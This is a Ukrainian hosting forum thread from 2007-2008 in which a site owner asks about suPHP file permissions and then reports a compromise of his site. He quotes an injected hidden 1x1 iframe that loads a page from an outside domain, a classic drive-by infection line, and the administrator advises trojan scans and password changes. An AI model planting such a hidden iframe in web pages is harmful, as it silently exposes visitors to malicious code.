Форум TopUA.NET

Український Хостинг
Ваш останній візит відбувся: П'ят, 21 березня, 2008 21:57 Сьогодні: П'ят, 21 березня, 2008 21:57

Часовий пояс UTC




 [ 17 повідомлень ]  На сторінку 1, 2  Далі
Автор Повідомлення
 Тема повідомлення: Питання безпеки
ПовідомленняДодано: Чет, 27 грудня, 2007 13:11 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
Поясніть мені будь ласка, як може бути що права на файл виставлено 644, а запустивши РНР-шний скріпт той здійснив в нього запис!?!?!

Дякую


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 27 грудня, 2007 13:32 
Офлайн
Аватар користувача

З нами з: Пон, 16 жовтня, 2006 02:40
Повідомлення: 280
Звідки: Дніпропетровськ
Таке може бути, якщо скрипт запускався з правами власника. Дивіться скріншот. У того файлу права 644.


У вас недостатньо прав для перегляду приєднаних до цього повідомлення файлів.

_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
Зображення


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 27 грудня, 2007 16:04 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Це точно!- я ж настроївся на глюк, а тут все пішло!!!


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 27 грудня, 2007 16:56 
Офлайн
Аватар користувача

З нами з: Пон, 16 жовтня, 2006 02:40
Повідомлення: 280
Звідки: Дніпропетровськ
BIBLOS написав:
Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Чому Ви так вирішили?

_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
Зображення


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 27 грудня, 2007 17:23 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
скрипт закинув через ФТП
Закрив, виставив права 644
Тоді через http запустив скрипт встановлення - все пішло запсало, створило новий файл. Я ж через http не авторизувався,
отже скрипт сам без всяких прав створив файлик і записав його!
Як?


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 27 грудня, 2007 18:13 
Офлайн
TopUA: Адміністратор

З нами з: Нед, 01 жовтня, 2006 13:55
Повідомлення: 1294
Пошукайте у гуглі про SuPHP :D

Це те, що мають мати всі хостери заради безпеки користувачів (але нажаль, дуже мало хто переймається безпекою).

_________________
● Підтримка користувачів — виключно через форум підтримки
Умови надання послуг безкоштовного хостингу


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Вів, 22 січня, 2008 09:52 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
Дякую за відповідь. Пошукав, почитав.
Та я нічого не знаю за механізм, і в неті теж не описується, тільки констатація що це і для чого.
Я так зрозумів це модуль який виконує скрипт з правами власника, але ж тоді можна написати код якого небудь двигунця, відкрити доступ до закачки, і "лазити" по чужих сайтах використовуючи функції suPHP?!


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Сер, 06 лютого, 2008 12:40 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
Ще потрібна консультація, чи то відповідь:

Появився на сайті в коді такий собі
...http://leohin.com/.....

Це справа рук Адміна чи "мене Хакнули"?
Дякую!?!?!?!?!


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Сер, 06 лютого, 2008 12:57 
Офлайн
Аватар користувача

З нами з: Пон, 16 жовтня, 2006 02:40
Повідомлення: 280
Звідки: Дніпропетровськ
Де у коді? Я головну завантажив - нічого немає.

_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
Зображення


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Сер, 06 лютого, 2008 13:16 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
СОРІ! Я щойно закинув оновлення!!!!
Забувся, прошу вибачення, але наведений код СПРАВДІ ТАМ був.
Я це замітив по зміні розміру Контрольної копії і на сайті, а після -в модзілі заблоковано було ЯВА, воно мене "обізвало", я зразу закачав і був в шоці, але подумав -можливо це хостери - але ваша відповідь мене насторожує - ЯК!?!?!?!
>>
Привіт!
Подивіться вихідний текст завантаженої сторінки!!!!!!!
там таке
<iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>

Я фреймів не люблю в принципі, і користуюсь сам особисо на 0 %, тому коду такого НЕ ВСТАВЛЯВ ні звідки!!!
???


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 07 лютого, 2008 02:17 
Офлайн
TopUA: Адміністратор

З нами з: Нед, 01 жовтня, 2006 13:55
Повідомлення: 1294
Перевірте ваш ПК на наявність троянів...

_________________
● Підтримка користувачів — виключно через форум підтримки
Умови надання послуг безкоштовного хостингу


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 07 лютого, 2008 15:45 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
2 компютери з 3 перевірені...поки чисто...

Але тепер ще один прикол (його теж раніше не було)
Модзілка показує що заблокований скрипт "about:blank" при загрузці сторінок BIBLOS?


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 07 лютого, 2008 22:03 
Офлайн
TopUA: Адміністратор

З нами з: Нед, 01 жовтня, 2006 13:55
Повідомлення: 1294
Поясніть мені, яке я маю до цього відношення? Дуже прошу самотужки розбиратись з тим, що ви встановлюєте на вашому акаунті.

Змініть паролі, видаліть троянів. Якщо є проблема з сервером — буду радий допомогти, але проблеми з сервером немає.

Дякую.

_________________
● Підтримка користувачів — виключно через форум підтримки
Умови надання послуг безкоштовного хостингу


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: П'ят, 08 лютого, 2008 10:21 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
Прошу не ображатись ;)
Я справді таких випадків не мав! :shock:-на третьому компі були Трояни:x
Буду знати і постараюсь більше не турбувати з такого приводу :oops:

Дякую


Догори
 Профіль  
 
 Тема повідомлення:
ПовідомленняДодано: Чет, 14 лютого, 2008 13:46 
Офлайн

З нами з: Вів, 24 жовтня, 2006 10:37
Повідомлення: 93
Ну ось? Машина чиста, перевірив 5 різними прогами. Більше на сайт не ходив.Я змінив пароль, витер куки і нічого більше не робив.
Пройшло 2 дні -
Прошу загрузити титул - http://www.BIBLOS.org.ua/
там прогружається Ява з ІР- 58.....
:?


Догори
 Профіль  
 
Відображати повідомлення за:  Сортувати за  
 [ 17 повідомлень ]  На сторінку 1, 2  Далі

Часовий пояс UTC


Хто зараз онлайн

Зараз переглядають цей форум: Немає зареєстрованих користувачів і 1 гість


Ви не можете створювати нові теми у цьому форумі
Ви не можете відповідати на теми у цьому форумі
Ви не можете редагувати ваші повідомлення у цьому форумі
Ви не можете видаляти ваші повідомлення у цьому форумі
Ви не можете додавати файли у цьому форумі

Вперед:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Український переклад © 2005-2007 Українська підтримка phpBB


���������� ������� TOP.TOPUA.NET